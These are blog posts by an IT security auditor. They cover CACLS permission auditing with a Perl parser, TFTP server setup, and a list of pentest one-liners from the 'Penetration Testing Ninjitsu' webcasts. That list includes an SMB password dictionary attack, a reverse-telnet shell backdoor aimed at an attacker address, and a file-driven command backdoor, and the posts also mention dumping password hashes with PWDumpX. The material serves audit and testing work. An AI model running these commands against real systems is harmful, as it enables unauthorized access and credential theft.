Auditing Folder (and subfolder) Permissions using CACLS
CACLS.exe is a great builtin Windows utility that allows you to list the permissions on a file or folder. This command has been used in an audit to get the permissions of the folders on an agency file server that served the “private” shares to each Domain user. The findings we would be looking for when examining the results are improper access to the “private” shares by other Domain users.
For CACLS options and how to interpret the results see this site.
The command that I run is as follows:
c:\>for /f "delims=" %a in ('dir /b') do @cacls "%a" >> savefile.txt
Once results are obtained they need to be parsed so they can be analyzed. I have written a perl script to add the correct folder name to each permission. This is so they can be sorted by permission in your spreadsheet application of choice.
#!/usr/bin/perl
$numArgs = $#ARGV +1;
if($numArgs < 2){
print "Invalid Number of Arguments\\\\n";
print "caclsparse.pl <filename> <foldername>\\\\n\\\\n";
print "foldername example: D:\\\\\\\\Share\\\\n";
print "You need to escape the backslash twice.\\\\n";
exit;
}
#open the file
$infile = "$ARGV[0]";
open(DAT, $infile) || die("Something did not work. You figure it out.");
#save file contents into an array
@raw_data=<DAT>;
close(DAT);
#Cycle through the entire array
for($count=0;$count<=$#raw_data;$count++){
#pull folder name, split it, and print it
#the first record in each grouping is the only record with the folder name
if(@raw_data[$count] =~ /($ARGV[1])/){
$x = 0;
while(substr(@raw_data[$count+1],$x,1) eq " "){
$x++;
}
$folder = substr(@raw_data[$count],0,$x-1);
$permissions = substr(@raw_data[$count],$x,length(@raw_data[$count]) - $x);
print "$folder,$permissions\\\\n";
#cycle through the permissions listed below the folder name
for($c=$count+1;$c<=$#raw_data;$c++){
#clear all whitespace
$permissions = substr(@raw_data[$c],$x,length(@raw_data[$c]) - $x);
$permissions =~ s/^s+//;
$permissions =~ s/s+$//;
#print until you get to the next folder item
if(@raw_data[$c] =~ /($ARGV[1])/){last;}
print "$folder,$permissions\\\\n";
}
}
}
Save the code and run it as follows:
$perl caclsparse.pl savefile.txt D:\\Share >> parseresults.csv
NOTE: I run it from Linux but ActivePerl for Windows will work as well. Installing perl is outside the scope of this posting.
Open parseresults.csv in Excel/OO Calcs/Gnumeric and begin analyzing the results!
Penetration Testing Ninjitsu
Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these web casts and downloading the slides for your reference. I’m including the commands extracted from the slides that can be very useful for a penetration test.
Ninjitsu I
Ping Sweep
C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”
Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
Ninjitsu II
Linux Command-Line Port Scanner
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]
Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Ninjitsu III
Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)
Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"
Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"
Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI
List Domain Password Settings
C:\>net accounts /domain
Auditing Windows Account Management
At the NSAA IT Conference and Workshop, put on by NASACT, I presented on Auditing Windows Account Management. I’m posting the slides to my presentation as reference. I would love any feedback from anybody who attended the presentation. The tool PWDumpX was demonstrated during the presentation. A document on how to use the tool to obtain Windows Domain account password hashes has been posted.
Setup TFTP
A TFTP Server for in Information Systems Auditor is an important tool. It has come in handy in a couple situations during an audit. The two that come to mind are retrieving Cisco configuration files and uploading Netcat during a SQL audit or SQL Injection test. This is a quick post on how I like to setup my tftp server on Linux and Windows.
My Linux distro of choice is Ubuntu.
$sudo -s
#apt-get install atftpd
#mkdir /tftproot
#chmod 777 /tftproot
#atftpd –daemon /tftproot
That will get you started on Linux. For Windows I like the free tftp server you get from www.solarwinds.com. Download and install. Create the directory C:\TFTP-Root.
Hello Auditors!
Welcome to jedge.com. I’m James Edge the host of this site. My goal for this site is to create a colaborative portal for documents, links, and thoughts regarding auditing Information System security at a state goverment level. I’ve been working in state government for a few years with both New York and Georgia state and I hope to express my thoughts and opinions related to auditing with what I’ve experienced working for those governments. Enjoy the site and feel free to post a comment for whatever reason. I hope the feedback I receive will further improve the site. Thanks.